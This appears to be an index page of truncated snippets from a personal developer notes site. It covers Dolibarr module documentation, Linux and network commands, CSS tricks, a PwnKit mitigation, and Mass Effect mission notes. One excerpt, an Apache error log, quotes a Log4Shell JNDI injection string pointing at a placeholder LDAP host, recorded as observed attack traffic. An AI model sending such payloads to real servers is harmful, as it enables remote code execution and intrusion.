// Array to add new pages in new tabs or remove existing one<br role="presentation" />$this->tabs =<br role="presentation" />array('objecttype:+tabname1:Title1:mylangfile@mymodule:$user->rights->mymodule->read:/mymodule<br role="presentation" />/mypagetab1.php?id=__ID_...
// Main menu entries<br role="presentation" />$this->menu = array(); // List of menus to add<br role="presentation" />$r=0;<br role="presentation" />// Add here entries to declare new menus<br role="presentation" />// Example to declare the Top Menu entry:<br role="prese...
$this->rights[$r][0] = 10001;<br role="presentation" />$this->rights[$r][1] = 'Label by default of permission';<br role="presentation" />$this->rights[$r][2] = 'r';<br role="presentation" />$this->rights[$r][3] = 1;<br role="presentation" /&...
Bank and Cash ->banque->lire, ->banque->modifier, ->banque->configurer, ->banque->consolidate, ->banque->export, ->banque->transfer, ->banque->cheque Barcode ->barcode->lire, ->barcode->creer, ->barcode->suppr...
addExtraField ( $attrname,$label, $type, $pos,$size,$elementtype,$unique = 0,$required = 0,$default_value = '',<br role="presentation" />$param = '',$alwayseditable = 0,$perms = '',$list = '-1',$help = '',$computed = '',$entity = '',$langfile = '',$enabl...
* Module SimplePOS is deprecated. If you need a POS module, please use the module TakePOS.<br role="presentation" />* The ICS value for direct debit or credit transfer is now stored on each bank account instead of<br role="presentation" />into the global setup.<br role="presentation" />* API /setup/sh...
If you deleted a module via FTP or etc, and getting error messages about missing files - delete all module constants in llx_const. If the module name was "xxx" the consts would be: MAIN_MODULE_XXX<br />...
This notice appears in the readme of almost all Dolibarr Modules.<br role="presentation" />Note: If this screen tell you there is no custom directory, check your setup is correct:<br role="presentation" />- In your Dolibarr installation directory, edit the ``````htdocs/conf/conf.php`````` file and check that<br ro...
img_picto()<br role="presentation" />Example:<br role="presentation" />img_picto(path,name);<br role="presentation" />Usage:<br role="presentation" />img_picto() will print an image with the path and title provided in the function ...
GETPOSTISSET() Example:<br role="presentation" />if (GETPOSTISSET('varname')){...}<br role="presentation" />Usage:<br role="presentation" />GETPOSTISSET will check if a $_POST or $_GET Variable with name "varname" is set...
GETPOST Function to get a value out of $_POST or $_GET request.<br role="presentation" />Varname: Is the name of the vaue provided via the request. The value will be stored in<br role="presentation" />$monChamp.<br role="presentation" />INT: Is a checking string. In this case it checks the value of th...
FK_STATUT<br role="presentation" />Angebote<br role="presentation" />• 0 - Entwurf nicht bestätigt<br role="presentation" />• 1 - Amngebot ist offen<br />• 2 - unterzeichnet / beauftragt / abrechenbar<br role="presentation" />• 3- Nich...
Here you can see a list of general dolibarr triggers! Trigger code ($action) Type object ($object) USER_CREATE user.class.php USER_MODIFY user.class.php USER_DELETE user.class.php USER_LOGIN user.class.php USER_LOGIN_FAILED user.class.php USER_LOGOUT user.class.php USER_ENABLEDISABLE user.class.php USER_NEW_PASSWORD user.class.php USER_SETINGROUP u...
Flight Radar --------------<br /> Tab PING<br /> Period INCREASE<br /> Comma DECREASE FLIGHT TARGETING --------------<br /> 9 HAIL TARGET<br /> 1-3 &am...
The most actual systems have an update for this. If not you can close this vulnerability by executing:<br /> chmod 0755 /usr/bin/pkexec This will remove the SUID Bit from the File.<br /> More info here: https://nvd.nist.gov/vuln/detail/CVE-2021-4034 Image for the Thumbnail: ...
[Fri Jan 28 03:42:04.636333 2022] [proxy:warn] [pid 30819] [client 98.0.242.10:46192] AH10188: Max-Forwards value '${jndi:ldap://X.X.X.X:1389/a}' could not be parsed, referer: ${jndi:ldap://X.X.X.X:1389/a}<br /> [Fri Jan 28 03:42:04.636394 2022] [proxy:error] [pid 30819] [client 98.0.242.10:46192] AH00898: Max-Forwards request...
Here is an example how to replace for example the string "https://test.de/testthis/" with "https://newlink.de/testthis/". The code is: UPDATE tablenamehere<br /> SET columnname = REPLACE(columnname , 'test.de', 'newlink.de'); ...
1. Rename your .apk to .zip<br /> 2. Unzip<br /> 3. locate classes.dex<br /> 4. Download Dex2Jar (Windows/Linux)<br /> 5. Use cmd/shell to navigate to dex2jar Folder.<br /> 6. Use command "dex2jar <source>" with source as your classes.dex file.<br /> 7. Now you have a new .jar file...
Only to store. I am not working on this enigma Cr4P ...
Here are the copies of the unknown book that i found. Page after page... ...
The "Sommerton Man" is an unknown person who died on the 30. Nov 1948 in Australia. Here you can get the Autopsy Report. The cause of death is unknown, but its rumored that he died from intoxication of an unknown poison.A Cipher has been found under mysterious cirmunstances which seems like a digitless code.<br /> <br /&g...
Content Security Header (HSTS) Apache:<br /> Header set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" Nginx:<br /> add_header Strict-Transport-Security 'max-age=31536000; includeSubDomains; preload'; Content Security Policy (CSP) Apache:<br /> Header always set Content-S...
Attention! This script has been written 2010 and could be outdated. Start.SH - Start Firewall #!/bin/sh<br /> #Start Firewall<br /> #Copyright by Xeno<br /> # echo<br /> echo Firewall Starter<br /> echo<br /> echo Die Firewall wird gestartet und der Port 22 SSH<br /> echo für die Fernkontrolle frei...
<!doctype html><br /> <html><br /> <head><br /> <meta charset="utf-8"><br /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><br /> <meta name="viewport" con...
Code for an Animated Border on a Box, only with CSS and HTML used! <style><br /> .container{ padding-top: 20px;<br /> padding-bottom: 20px;}<br /> <br /> .b...
This is the code for an .htaccess file which does: -> Redirect all www requests to non-www requests<br /> -> Always force SSL<br /> <br /> RewriteCond %{HTTPS} !=on<br /> RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]<br /> RewriteCond %{HTTP_HOST} ^www\\.(.*)$ [NC]<br /> RewriteRule ^(....
<style><br /> .pie {<br /> /* Basic layout */<br /> display: inline-block;<br /> width: 10em;<br /> height: 10em;<br /> border-radius: 50%; ...
Flicker Text Example <style>@keyframes textflicker {<br /> from {text-shadow: 1px 0 0 #C1C1C1, -2px 0 0 #000000}<br /> to {text-shadow: 2px 0.5px 2px #C1C1C1, -1px -0.5px 2px #000000;}}<br /> #statered2 { padding: 1em;<br /> colo...
Here is a sample command for cmd to set a Port Forwarding on a Windows Client Example:<br /> netsh interface portproxy add v4tov4 listenaddress=192.168.178.54 listenport=1254 connectaddress=192.168.178.55 connectport=80 ...
Create a new Repository from Command Line echo "# asd" >> README.md<br /> git init<br /> git add README.md<br /> git commit -m "first commit"<br /> git branch -M main<br /> git remote add origin https://github.com/bugfishtm/asd.git<br /> git push -u origin main Pu...
How to use git to clone a remote repository? Open the CommandLine Navigate to the Folder You want to get the repository cloned to Execute Git Command: "git clone https://yourgitlaburl.url/group/repository.git" Now the actual repository files should be in your Folder. A successfull output looks like this: Cloning into 'exam...
Find a String inside Files<br /> grep -rnw '/path/to/somewhere/' -e 'pattern'<br /> <br /> Find File in Folder Structure<br /> find ./ -name card.php Display Linux System Informations<br /> uname Display Kernel Releases Informations<br /> uname -r Display Systems uptime and load av...
This is an easy postfix configuration to backup all emails going to specified domains until the master server is online again. Postfix Configuration [replace yourhostname with your hostname]: smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated reject_unauth_destination<br /> myhostname = yourhostname<br /> ...
This unix Command will make a file non-writable. Make non-Writable chattr +i file Make writable again chattr -i file See Status: lsattr file ...
This adds a rule to forwars port 1022 to port 22 (SSH) an another internal IP.<br /> iptables -t nat -A PREROUTING -i vmbr0 -p tcp --dport 1022 -j DNAT --to 192.168.137.100:22<br /> <br /> This removes the previous commands changes:<br /> iptables -t nat -D PREROUTING -i vmbr0 -p tcp --dport 1022 -j DNAT --to 192.1...
This script is for a proxmox host to set up 2 bridges. 1 provides static ip 4 and 6 to vservers<br /> 1 provides NAT routed connection Start of /etc/network/interfaces # This file describes the network interfaces available on your system<br /> # and how to activate them. For more information, see interfaces(5). source /etc/ne...
If you encounter z-Index Problems on safari you can try to put that code into your z-indexed element: -webkit-transform: translate3d(0, 0, 0);<br /> transform: translate3d(0, 0, 0); ...
Put this into an element to prevent padding / borders from changing the width of an element. -webkit-box-sizing: border-box; /* Chrome */ -moz-box-sizing: border-box; /* Firefox */ box-sizing: border-box; /* Opera/IE */ ...
You can download my full Paragon Savegame here! Details:<br /> -> All Missions and DLC Mission achieved<br /> -> Cerberus has taken over Collectors Ship<br /> -> All Crew Members and Kaidan survived<br /> -> Council Survived<br /> -> ME2 has been played with ME1 full Paragon Savegame ...
Objective is to locate a protean sphere and report it to the citadel.<br /> Location: Gei Hinnom / Sheol / Hades Nexus Unfortunately there are no Images available. ...
Objective is to clear the mine from transformed workers.<br /> Location: Aequitas / Fortis / Minos Wasteland<br /> Unfortunately we have no Images available related to this Mission. ...
Objective is to disable a Geth Weather device, which changes the planets atmossphere.<br /> Location: Canalus / Dirada / Pylos Nebula ...
Objective is to repair the magnetic shield, which protects the planet from interstellar radiation.<br /> Location: Sinmara / Solveig / Caleston Rift ...
Objective is to destroy a vorcha weapons base and flee from the location.<br /> Location: Zada Ban / Xe Cha / The Shrike Abysall ...
Objective is to secure mainframe data from an ancient ship, which is in danger to fall from a cliff.<br /> Location: Zanethu / Ploitari / Hourglass Nebula ...
Objective is to disable the Rescue Beacon and fight the malfunctioning LOKI Mechs.<br /> Location: Neith / Amun / Eagle Nebula ...
Objective is to reactivate a mesh and use him to break all walls which are blocking the way to retrieve an ancient artifact.<br /> Location: Taitus / Talava / Caleston rift ...
Illegal Mercenary Activity on this planet to take care of.<br /> Location: Joab / Enoch / Rosetta Nebula ...
Objective is to destroy a mercenary base and decrypt a hostile message.<br /> Location: Helyme / Zelene / Crescent Nebula ...
Here is an example function to get the full html output code of an URL provided to the function into a string.<br /> You can get the data by using a string variable which gets the output: string variable = gethtmlcontent("https://thisisapage"); &...